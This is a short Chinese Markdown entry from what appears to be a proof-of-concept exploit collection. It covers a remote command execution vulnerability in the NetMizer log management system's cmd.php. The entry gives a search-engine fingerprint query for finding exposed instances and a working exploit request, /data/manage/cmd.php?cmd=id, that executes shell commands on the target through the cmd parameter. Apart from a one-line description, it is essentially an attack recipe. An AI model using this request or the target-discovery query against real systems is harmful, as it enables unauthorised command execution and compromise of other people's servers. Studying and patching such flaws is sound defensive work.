Awesome-POC/网络设备漏洞/NetMizer 日志管理系统 cmd.php 远程命令执行漏洞.md

31 lines
512 B
Markdown
Raw Normal View History

2022-05-19 18:49:40 +08:00
# NetMizer 日志管理系统 cmd.php 远程命令执行漏洞
## 漏洞描述
NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞攻击者通过传入 cmd参数即可命令执行
## 漏洞影响
```
NetMizer 日志管理系统
```
2023-08-28 15:55:36 +08:00
## 网络测绘
2022-05-19 18:49:40 +08:00
```
title="NetMizer 日志管理系统"
```
## 漏洞复现
登录页面
2022-12-05 11:09:28 +08:00
![image-20220519175506872](./images/202205191755197.png)
2022-05-19 18:49:40 +08:00
验证POC
```
/data/manage/cmd.php?cmd=id
```
2022-12-05 11:09:28 +08:00
![image-20220519175604237](./images/202205191756275.png)